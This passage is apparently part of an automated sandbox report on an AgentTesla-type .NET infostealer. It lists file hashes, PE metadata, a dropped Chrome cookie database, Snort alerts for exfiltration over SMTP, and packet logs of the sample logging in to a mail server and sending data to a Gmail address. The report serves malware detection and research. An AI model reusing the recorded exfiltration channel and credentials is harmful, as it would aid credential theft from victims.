                              • Excluded IPs from analysis (whitelisted): 104.42.151.234, 52.147.198.201, 20.50.102.62, 52.155.217.156, 20.54.26.129, 2.20.143.16, 2.20.142.209, 92.122.213.194, 92.122.213.247
                              • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, au.download.windowsupdate.com.edgesuite.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus16.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              16:40:28API Interceptor709x Sleep call for process: 6Rn5G1VWPB.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              86.109.178.195Facturas_DHL.exeGet hashmaliciousBrowse

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                mail.garciadelacruz.comFacturas_DHL.exeGet hashmaliciousBrowse
                                • 86.109.178.195

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                ABANSYS_AND_HOSTYTEC-ASCCharlesRobertDarwin11ESFacturas_DHL.exeGet hashmaliciousBrowse
                                • 86.109.178.195
                                Documentation__UC8G8HI9.docGet hashmaliciousBrowse
                                • 86.109.178.160
                                Documentation__UC8G8HI9.docGet hashmaliciousBrowse
                                • 86.109.178.160
                                rzx0Vt5BFs.docGet hashmaliciousBrowse
                                • 86.109.178.160
                                764829483582_2019_04_12.docGet hashmaliciousBrowse
                                • 86.109.170.198
                                764829483582_2019_04_12.docGet hashmaliciousBrowse
                                • 86.109.170.198
                                http://mavitec.es/TlNxe-Od_FYMO-c5/ZS91/invoicing/En_us/Companies-Invoice-1220317Get hashmaliciousBrowse
                                • 86.109.167.210
                                fee-docs.docGet hashmaliciousBrowse
                                • 86.109.170.194
                                fee-docs.docGet hashmaliciousBrowse
                                • 86.109.170.194
                                fee-docs.docGet hashmaliciousBrowse
                                • 86.109.170.194
                                fee-docs.docGet hashmaliciousBrowse
                                • 86.109.170.194
                                FILE-679339.pdfGet hashmaliciousBrowse
                                • 86.109.167.76
                                DHL number - Mittwoch, 15_00-18_00 Uhr.docGet hashmaliciousBrowse
                                • 86.109.170.57
                                DHL number - Mittwoch, 15_00-18_00 Uhr.docGet hashmaliciousBrowse
                                • 86.109.170.57
                                emotet_36.docGet hashmaliciousBrowse
                                • 86.109.170.12
                                emotet_36.docGet hashmaliciousBrowse
                                • 86.109.170.12
                                http://l.e.lastlap.com/rts/go2.aspx?h=700033&tp=i-H43-Q4x-J7o-GuCmL-5V-A14-1c-GuWPV-FWem8Get hashmaliciousBrowse
                                • 86.109.162.135
                                http://l.e.lastlap.com/rts/go2.aspx?h=700033&tp=i-H43-Q4x-J7o-GuJdM-5V-Vn2-1c-GuWPV-3WGdUGet hashmaliciousBrowse
                                • 86.109.162.135
                                Scan1782384.docGet hashmaliciousBrowse
                                • 86.109.161.249
                                Scan1782384.docGet hashmaliciousBrowse
                                • 86.109.161.249

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6Rn5G1VWPB.exe.log
                                Process:C:\Users\user\Desktop\6Rn5G1VWPB.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1314
                                Entropy (8bit):5.350128552078965
                                Encrypted:false
                                SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                C:\Users\user\AppData\Roaming\ikffln5u.f20\Chrome\Default\Cookies
                                Process:C:\Users\user\Desktop\6Rn5G1VWPB.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                Category:dropped
                                Size (bytes):20480
                                Entropy (8bit):0.7006690334145785
                                Encrypted:false
                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.694119021117804
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:6Rn5G1VWPB.exe
                                File size:1162752
                                MD5:c12fea2da39e5173fa674ab5e22a928f
                                SHA1:ef3754b85ecd9f789bc9bbf8a8c6b36be41cc996
                                SHA256:19f2d4a6fe01ce9e0bc8362933e41f0d707df28bf9ab662db7dc7504aef3845a
                                SHA512:26bd4ff8262c9b5bb684889ab89b373a10f33b9fe61b88ee0ec7bea69390e1c461b62c17280f3e2e68ef48cce67be523559647552d6fdae1fd9b166e82f9ff0e
                                SSDEEP:24576:N6bI6jw9IkyU4BbYDW/X/4W7TPds2fSc8SfhJAwIdvLe6:0ESkkEkl7DdsDc5+VdvL
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..`..............P..0...........N... ...`....@.. ....................... ............@................................

                                File Icon

                                Icon Hash:d28ab3b0e0ab96c4

                                Static PE Info

                                General

                                Entrypoint:0x4f4eb2
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x609BC077 [Wed May 12 11:48:07 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:v4.0.30319
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0xf4e600x4f.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xf60000x288f8.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1200000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0xf4d280x1c.text
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000xf2eb80xf3000False0.913331082819data7.89681221538IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rsrc0xf60000x288f80x28a00False0.348028846154data5.39732699522IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x1200000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                RT_ICON0xf62b00x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                RT_ICON0x106ad80x94a8data
                                RT_ICON0x10ff800x5488data
                                RT_ICON0x1154080x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                RT_ICON0x1196300x25a8data
                                RT_ICON0x11bbd80x10a8data
                                RT_ICON0x11cc800x988data
                                RT_ICON0x11d6080x468GLS_BINARY_LSB_FIRST
                                RT_GROUP_ICON0x11da700x76data
                                RT_GROUP_ICON0x11dae80x14data
                                RT_VERSION0x11dafc0x394data
                                RT_MANIFEST0x11de900xa65XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                Imports

                                DLLImport
                                mscoree.dll_CorExeMain

                                Version Infos

                                DescriptionData
                                Translation0x0000 0x04b0
                                LegalCopyrightMacroeconomist
                                Assembly Version4.1.2.1
                                InternalNameNullableMarshaler.exe
                                FileVersion4.1.2.1
                                CompanyNameMacroeconomist 2021
                                LegalTrademarks
                                Comments
                                ProductNameGlobalizationExtensions
                                ProductVersion4.1.2.1
                                FileDescriptionGlobalizationExtensions
                                OriginalFilenameNullableMarshaler.exe

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                05/12/21-16:42:13.863185TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49765587192.168.2.486.109.178.195
                                05/12/21-16:42:16.929135TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49766587192.168.2.486.109.178.195

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                May 12, 2021 16:42:13.134754896 CEST49765587192.168.2.486.109.178.195
                                May 12, 2021 16:42:13.211566925 CEST5874976586.109.178.195192.168.2.4
                                May 12, 2021 16:42:13.211824894 CEST49765587192.168.2.486.109.178.195
                                May 12, 2021 16:42:13.377419949 CEST5874976586.109.178.195192.168.2.4
                                May 12, 2021 16:42:13.378144026 CEST49765587192.168.2.486.109.178.195
                                May 12, 2021 16:42:13.454828024 CEST5874976586.109.178.195192.168.2.4
                                May 12, 2021 16:42:13.455018044 CEST5874976586.109.178.195192.168.2.4
                                May 12, 2021 16:42:13.456748009 CEST49765587192.168.2.486.109.178.195
                                May 12, 2021 16:42:13.535165071 CEST5874976586.109.178.195192.168.2.4
                                May 12, 2021 16:42:13.535989046 CEST49765587192.168.2.486.109.178.195
                                May 12, 2021 16:42:13.617292881 CEST5874976586.109.178.195192.168.2.4
                                May 12, 2021 16:42:13.619561911 CEST49765587192.168.2.486.109.178.195
                                May 12, 2021 16:42:13.697374105 CEST5874976586.109.178.195192.168.2.4
                                May 12, 2021 16:42:13.697834969 CEST49765587192.168.2.486.109.178.195
                                May 12, 2021 16:42:13.781431913 CEST5874976586.109.178.195192.168.2.4
                                May 12, 2021 16:42:13.781960964 CEST49765587192.168.2.486.109.178.195
                                May 12, 2021 16:42:13.860829115 CEST5874976586.109.178.195192.168.2.4
                                May 12, 2021 16:42:13.863184929 CEST49765587192.168.2.486.109.178.195
                                May 12, 2021 16:42:13.863420963 CEST49765587192.168.2.486.109.178.195
                                May 12, 2021 16:42:13.864106894 CEST49765587192.168.2.486.109.178.195
                                May 12, 2021 16:42:13.864223957 CEST49765587192.168.2.486.109.178.195
                                May 12, 2021 16:42:13.940037012 CEST5874976586.109.178.195192.168.2.4
                                May 12, 2021 16:42:13.940723896 CEST5874976586.109.178.195192.168.2.4
                                May 12, 2021 16:42:14.269522905 CEST5874976586.109.178.195192.168.2.4
                                May 12, 2021 16:42:14.318522930 CEST49765587192.168.2.486.109.178.195
                                May 12, 2021 16:42:15.774117947 CEST49765587192.168.2.486.109.178.195
                                May 12, 2021 16:42:15.851397991 CEST5874976586.109.178.195192.168.2.4
                                May 12, 2021 16:42:15.852571011 CEST49765587192.168.2.486.109.178.195
                                May 12, 2021 16:42:15.853324890 CEST5874976586.109.178.195192.168.2.4
                                May 12, 2021 16:42:15.853451967 CEST49765587192.168.2.486.109.178.195
                                May 12, 2021 16:42:15.933919907 CEST5874976586.109.178.195192.168.2.4
                                May 12, 2021 16:42:16.297874928 CEST49766587192.168.2.486.109.178.195
                                May 12, 2021 16:42:16.374768019 CEST5874976686.109.178.195192.168.2.4
                                May 12, 2021 16:42:16.374926090 CEST49766587192.168.2.486.109.178.195
                                May 12, 2021 16:42:16.454835892 CEST5874976686.109.178.195192.168.2.4
                                May 12, 2021 16:42:16.455365896 CEST49766587192.168.2.486.109.178.195
                                May 12, 2021 16:42:16.532181978 CEST5874976686.109.178.195192.168.2.4
                                May 12, 2021 16:42:16.532442093 CEST5874976686.109.178.195192.168.2.4
                                May 12, 2021 16:42:16.535346985 CEST49766587192.168.2.486.109.178.195
                                May 12, 2021 16:42:16.612245083 CEST5874976686.109.178.195192.168.2.4
                                May 12, 2021 16:42:16.612946033 CEST49766587192.168.2.486.109.178.195
                                May 12, 2021 16:42:16.690330029 CEST5874976686.109.178.195192.168.2.4
                                May 12, 2021 16:42:16.690743923 CEST49766587192.168.2.486.109.178.195
                                May 12, 2021 16:42:16.767704010 CEST5874976686.109.178.195192.168.2.4
                                May 12, 2021 16:42:16.768399000 CEST49766587192.168.2.486.109.178.195
                                May 12, 2021 16:42:16.846424103 CEST5874976686.109.178.195192.168.2.4
                                May 12, 2021 16:42:16.846874952 CEST49766587192.168.2.486.109.178.195
                                May 12, 2021 16:42:16.926548004 CEST5874976686.109.178.195192.168.2.4
                                May 12, 2021 16:42:16.928909063 CEST49766587192.168.2.486.109.178.195
                                May 12, 2021 16:42:16.929135084 CEST49766587192.168.2.486.109.178.195
                                May 12, 2021 16:42:16.929260969 CEST49766587192.168.2.486.109.178.195
                                May 12, 2021 16:42:16.929411888 CEST49766587192.168.2.486.109.178.195
                                May 12, 2021 16:42:16.929640055 CEST49766587192.168.2.486.109.178.195
                                May 12, 2021 16:42:16.929826021 CEST49766587192.168.2.486.109.178.195
                                May 12, 2021 16:42:16.929915905 CEST49766587192.168.2.486.109.178.195
                                May 12, 2021 16:42:16.930042982 CEST49766587192.168.2.486.109.178.195
                                May 12, 2021 16:42:17.007592916 CEST5874976686.109.178.195192.168.2.4
                                May 12, 2021 16:42:17.008039951 CEST5874976686.109.178.195192.168.2.4
                                May 12, 2021 16:42:17.008965969 CEST5874976686.109.178.195192.168.2.4
                                May 12, 2021 16:42:17.008979082 CEST5874976686.109.178.195192.168.2.4
                                May 12, 2021 16:42:17.420620918 CEST5874976686.109.178.195192.168.2.4
                                May 12, 2021 16:42:17.475102901 CEST49766587192.168.2.486.109.178.195

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                May 12, 2021 16:40:18.445195913 CEST5802853192.168.2.48.8.8.8
                                May 12, 2021 16:40:18.495414019 CEST53580288.8.8.8192.168.2.4
                                May 12, 2021 16:40:19.896186113 CEST5309753192.168.2.48.8.8.8
                                May 12, 2021 16:40:19.944896936 CEST53530978.8.8.8192.168.2.4
                                May 12, 2021 16:40:20.977637053 CEST4925753192.168.2.48.8.8.8
                                May 12, 2021 16:40:21.030966997 CEST53492578.8.8.8192.168.2.4
                                May 12, 2021 16:40:22.337939978 CEST6238953192.168.2.48.8.8.8
                                May 12, 2021 16:40:22.389678001 CEST53623898.8.8.8192.168.2.4
                                May 12, 2021 16:40:23.664412022 CEST4991053192.168.2.48.8.8.8
                                May 12, 2021 16:40:23.717228889 CEST53499108.8.8.8192.168.2.4
                                May 12, 2021 16:40:24.927752018 CEST5585453192.168.2.48.8.8.8
                                May 12, 2021 16:40:24.980926037 CEST53558548.8.8.8192.168.2.4
                                May 12, 2021 16:40:26.547545910 CEST6454953192.168.2.48.8.8.8
                                May 12, 2021 16:40:26.599379063 CEST53645498.8.8.8192.168.2.4
                                May 12, 2021 16:40:27.727233887 CEST6315353192.168.2.48.8.8.8
                                May 12, 2021 16:40:27.775940895 CEST53631538.8.8.8192.168.2.4
                                May 12, 2021 16:40:30.397442102 CEST5299153192.168.2.48.8.8.8
                                May 12, 2021 16:40:30.446260929 CEST53529918.8.8.8192.168.2.4
                                May 12, 2021 16:40:31.586272001 CEST5370053192.168.2.48.8.8.8
                                May 12, 2021 16:40:31.635117054 CEST53537008.8.8.8192.168.2.4
                                May 12, 2021 16:40:32.475155115 CEST5172653192.168.2.48.8.8.8
                                May 12, 2021 16:40:32.532696962 CEST53517268.8.8.8192.168.2.4
                                May 12, 2021 16:40:33.587733984 CEST5679453192.168.2.48.8.8.8
                                May 12, 2021 16:40:33.647283077 CEST53567948.8.8.8192.168.2.4
                                May 12, 2021 16:40:34.448817015 CEST5653453192.168.2.48.8.8.8
                                May 12, 2021 16:40:34.500467062 CEST53565348.8.8.8192.168.2.4
                                May 12, 2021 16:40:35.432074070 CEST5662753192.168.2.48.8.8.8
                                May 12, 2021 16:40:35.480787992 CEST53566278.8.8.8192.168.2.4
                                May 12, 2021 16:40:37.240926027 CEST5662153192.168.2.48.8.8.8
                                May 12, 2021 16:40:37.289674044 CEST53566218.8.8.8192.168.2.4
                                May 12, 2021 16:40:38.215845108 CEST6311653192.168.2.48.8.8.8
                                May 12, 2021 16:40:38.276186943 CEST53631168.8.8.8192.168.2.4
                                May 12, 2021 16:40:39.350717068 CEST6407853192.168.2.48.8.8.8
                                May 12, 2021 16:40:39.400345087 CEST53640788.8.8.8192.168.2.4
                                May 12, 2021 16:40:42.640199900 CEST6480153192.168.2.48.8.8.8
                                May 12, 2021 16:40:42.689085960 CEST53648018.8.8.8192.168.2.4
                                May 12, 2021 16:40:47.615437031 CEST6172153192.168.2.48.8.8.8
                                May 12, 2021 16:40:47.675681114 CEST53617218.8.8.8192.168.2.4
                                May 12, 2021 16:41:03.036144018 CEST5125553192.168.2.48.8.8.8
                                May 12, 2021 16:41:03.250905037 CEST53512558.8.8.8192.168.2.4
                                May 12, 2021 16:41:03.817640066 CEST6152253192.168.2.48.8.8.8
                                May 12, 2021 16:41:03.877968073 CEST53615228.8.8.8192.168.2.4
                                May 12, 2021 16:41:04.456588984 CEST5233753192.168.2.48.8.8.8
                                May 12, 2021 16:41:04.546590090 CEST53523378.8.8.8192.168.2.4
                                May 12, 2021 16:41:04.760132074 CEST5504653192.168.2.48.8.8.8
                                May 12, 2021 16:41:04.817827940 CEST53550468.8.8.8192.168.2.4
                                May 12, 2021 16:41:04.977973938 CEST4961253192.168.2.48.8.8.8
                                May 12, 2021 16:41:05.036331892 CEST53496128.8.8.8192.168.2.4
                                May 12, 2021 16:41:05.634725094 CEST4928553192.168.2.48.8.8.8
                                May 12, 2021 16:41:05.683474064 CEST53492858.8.8.8192.168.2.4
                                May 12, 2021 16:41:06.247292995 CEST5060153192.168.2.48.8.8.8
                                May 12, 2021 16:41:06.304621935 CEST53506018.8.8.8192.168.2.4
                                May 12, 2021 16:41:06.758164883 CEST6087553192.168.2.48.8.8.8
                                May 12, 2021 16:41:06.820440054 CEST53608758.8.8.8192.168.2.4
                                May 12, 2021 16:41:07.621284008 CEST5644853192.168.2.48.8.8.8
                                May 12, 2021 16:41:07.680427074 CEST53564488.8.8.8192.168.2.4
                                May 12, 2021 16:41:08.857274055 CEST5917253192.168.2.48.8.8.8
                                May 12, 2021 16:41:08.914813042 CEST53591728.8.8.8192.168.2.4
                                May 12, 2021 16:41:09.355947018 CEST6242053192.168.2.48.8.8.8
                                May 12, 2021 16:41:09.413249016 CEST53624208.8.8.8192.168.2.4
                                May 12, 2021 16:41:12.174837112 CEST6057953192.168.2.48.8.8.8
                                May 12, 2021 16:41:12.236542940 CEST53605798.8.8.8192.168.2.4
                                May 12, 2021 16:41:22.057522058 CEST5018353192.168.2.48.8.8.8
                                May 12, 2021 16:41:22.117943048 CEST53501838.8.8.8192.168.2.4
                                May 12, 2021 16:41:22.240628958 CEST6153153192.168.2.48.8.8.8
                                May 12, 2021 16:41:22.299323082 CEST53615318.8.8.8192.168.2.4
                                May 12, 2021 16:41:24.312402964 CEST4922853192.168.2.48.8.8.8
                                May 12, 2021 16:41:24.371192932 CEST53492288.8.8.8192.168.2.4
                                May 12, 2021 16:41:58.178168058 CEST5979453192.168.2.48.8.8.8
                                May 12, 2021 16:41:58.235702991 CEST53597948.8.8.8192.168.2.4
                                May 12, 2021 16:42:00.238121033 CEST5591653192.168.2.48.8.8.8
                                May 12, 2021 16:42:00.304614067 CEST53559168.8.8.8192.168.2.4
                                May 12, 2021 16:42:12.913924932 CEST5275253192.168.2.48.8.8.8
                                May 12, 2021 16:42:13.008151054 CEST53527528.8.8.8192.168.2.4
                                May 12, 2021 16:42:16.233340979 CEST6054253192.168.2.48.8.8.8
                                May 12, 2021 16:42:16.293699980 CEST53605428.8.8.8192.168.2.4

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                May 12, 2021 16:42:12.913924932 CEST192.168.2.48.8.8.80xf629Standard query (0)mail.garciadelacruz.comA (IP address)IN (0x0001)
                                May 12, 2021 16:42:16.233340979 CEST192.168.2.48.8.8.80xe06Standard query (0)mail.garciadelacruz.comA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                May 12, 2021 16:42:13.008151054 CEST8.8.8.8192.168.2.40xf629No error (0)mail.garciadelacruz.com86.109.178.195A (IP address)IN (0x0001)
                                May 12, 2021 16:42:16.293699980 CEST8.8.8.8192.168.2.40xe06No error (0)mail.garciadelacruz.com86.109.178.195A (IP address)IN (0x0001)

                                SMTP Packets

                                TimestampSource PortDest PortSource IPDest IPCommands
                                May 12, 2021 16:42:13.377419949 CEST5874976586.109.178.195192.168.2.4220 h0226.hostytec.com ESMTP Postfix
                                May 12, 2021 16:42:13.378144026 CEST49765587192.168.2.486.109.178.195EHLO 813848
                                May 12, 2021 16:42:13.455018044 CEST5874976586.109.178.195192.168.2.4250-h0226.hostytec.com
                                250-PIPELINING
                                250-SIZE 20480000
                                250-ETRN
                                250-STARTTLS
                                250-AUTH DIGEST-MD5 CRAM-MD5 PLAIN LOGIN
                                250-ENHANCEDSTATUSCODES
                                250-8BITMIME
                                250 CHUNKING
                                May 12, 2021 16:42:13.456748009 CEST49765587192.168.2.486.109.178.195AUTH login aW5mb0BnYXJjaWFkZWxhY3J1ei5jb20=
                                May 12, 2021 16:42:13.535165071 CEST5874976586.109.178.195192.168.2.4334 UGFzc3dvcmQ6
                                May 12, 2021 16:42:13.617292881 CEST5874976586.109.178.195192.168.2.4235 2.7.0 Authentication successful
                                May 12, 2021 16:42:13.619561911 CEST49765587192.168.2.486.109.178.195MAIL FROM:<info@garciadelacruz.com>
                                May 12, 2021 16:42:13.697374105 CEST5874976586.109.178.195192.168.2.4250 2.1.0 Ok
                                May 12, 2021 16:42:13.697834969 CEST49765587192.168.2.486.109.178.195RCPT TO:<williamslucy570@gmail.com>
                                May 12, 2021 16:42:13.781431913 CEST5874976586.109.178.195192.168.2.4250 2.1.5 Ok
                                May 12, 2021 16:42:13.781960964 CEST49765587192.168.2.486.109.178.195DATA
                                May 12, 2021 16:42:13.860829115 CEST5874976586.109.178.195192.168.2.4354 End data with <CR><LF>.<CR><LF>
                                May 12, 2021 16:42:13.864223957 CEST49765587192.168.2.486.109.178.195.
                                May 12, 2021 16:42:14.269522905 CEST5874976586.109.178.195192.168.2.4250 2.0.0 Ok: queued as B83851082C54E
                                May 12, 2021 16:42:15.774117947 CEST49765587192.168.2.486.109.178.195QUIT
                                May 12, 2021 16:42:15.851397991 CEST5874976586.109.178.195192.168.2.4221 2.0.0 Bye
                                May 12, 2021 16:42:16.454835892 CEST5874976686.109.178.195192.168.2.4220 h0226.hostytec.com ESMTP Postfix
